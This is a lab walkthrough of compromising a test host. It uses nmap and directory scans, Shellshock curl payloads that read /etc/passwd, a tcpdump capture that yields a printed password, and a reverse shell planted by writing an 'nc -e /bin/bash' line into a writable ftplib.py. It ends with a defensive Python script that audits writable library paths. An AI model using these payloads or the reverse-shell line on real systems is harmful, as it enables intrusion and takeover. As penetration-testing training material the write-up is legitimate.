Scanning the target with nmap -A -T4 -p- 192.168.1.2 -vv

Now on port 80 we're going to use dirsearch as dirsearch -u http://192.168.1.2/ -w /usr/share/dirb/wordlist/big.txt -e txt,php, and we find several directories:
/gate
/cerberus/
tartarus/
/hermes
research

Inside /gate/Cerberus/tartarus using curl -v:

So maybe I'm heading in the wrong direction; let's try the cgi-bin and server-status directories, this time with gobuster:
gobuster dir -u http://192.168.1.2/cgi-bin -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Now we found the underworld:

OK, the page displays uptime:

OK, I searched Google and this is Shellshock against a bash CGI script. We can use curl -v http://192.168.1.2/cgi-bin/underworld -H "custom:() { ignored; }; /usr/bin/id"

It worked, let's tweak the command a bit: curl -v http://192.168.1.2/cgi-bin/underworld -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"

So far it's working; we can now get a shell through the Apache CGI script using Metasploit:



Using the LinEnum.sh script I found a tcpdump binary we can take advantage of, using tcpdump -D to list the interfaces

After some time, transfer the file output.pcap to your machine and read it with tcpdump -qns 0 -A -r output.pcap

We got the user hades and the password PTpZTfU4vxgzvRBE; now we log in over the SSH service.

Got nothing, so I used the pspy32 tool to see what's going on, and I found this:

Viewing the file ftpclient.py

OK, the file ftplib.py is in the directory /usr/lib/python2.7 and it is writable:

We can add our line to the file:
os.system("nc -e /bin/bash 192.168.1.13 4444")
Now we wait a bit and we get a shell back to our listening port: nc -nlvp 4444
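The root cause of that last step is a library directory a low-privileged user can write to, so a root-owned script importing ftplib runs attacker-controlled code. The following audit is an added example for this write-up (not code from the original post): it reports modules or library directories that are group- or world-writable, run over a constructed sample tree and over the live sys.path. The file names under the temporary directory are constructed for the demo.

```python
"""Audit Python library directories for modules a non-owner could modify."""
import os
import stat
import sys
import tempfile

GROUP_OR_WORLD_WRITE = stat.S_IWGRP | stat.S_IWOTH


def writable_by_others(path):
    """True if the group or world write bit is set on path (symlinks followed)."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & GROUP_OR_WORLD_WRITE)


def audit_module_paths(dirs):
    """Return sorted paths under dirs that a non-owner could modify:
    writable .py/.pth files, or a writable directory (anyone can drop a
    new module there that shadows a standard one)."""
    findings = set()
    for d in dirs:
        if not d or not os.path.isdir(d):
            continue
        if writable_by_others(d):
            findings.add(d)
        for name in os.listdir(d):
            if not name.endswith((".py", ".pth")):
                continue
            full = os.path.join(d, name)
            if os.path.isfile(full) and writable_by_others(full):
                findings.add(full)
    return sorted(findings)


def build_demo_tree():
    """Constructed sample: one correctly permissioned module (0644) and one
    world-writable module (0666), mirroring the writable ftplib.py above."""
    root = tempfile.mkdtemp(prefix="pylib_audit_")  # created with mode 0700
    for name, mode in (("os_helpers.py", 0o644), ("ftplib.py", 0o666)):
        path = os.path.join(root, name)
        with open(path, "w") as handle:
            handle.write("# sample module\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    print("demo tree:", audit_module_paths([build_demo_tree()]))
    print("live sys.path:", audit_module_paths(sys.path) or "nothing writable")
```

On a hardened host the live sys.path scan should print "nothing writable"; any hit is a module or directory to chown root and chmod 755/644.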
